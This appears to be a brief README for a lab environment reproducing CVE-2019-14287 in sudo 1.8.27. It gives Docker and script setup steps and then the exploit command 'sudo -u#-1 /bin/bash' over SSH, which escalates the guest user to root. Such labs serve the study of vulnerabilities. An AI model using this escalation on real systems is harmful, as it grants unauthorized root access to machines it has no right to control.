https://nvd.nist.gov/vuln/detail/CVE-2019-14287
https://www.sudo.ws/alerts/minus_1_uid.html
- Ubuntu 18.04.4 LTS
- Sudo 1.8.27
-
Server
-
Docker version:
bash Docker\ version/start.sh bash Docker\ version/stop.sh
-
Script version:
cd Script_version && sudo bash installation.sh
-
-
Terminal:
- Docker version:
ssh <Server IP> -l guest -p 8022 /usr/local/bin/sudo -u#-1 /bin/bash
- Script version:
ssh <Server IP> -l guest -p 22 /usr/local/bin/sudo -u#-1 /bin/bash
The result is the escalation of user guest to root.
- Docker version: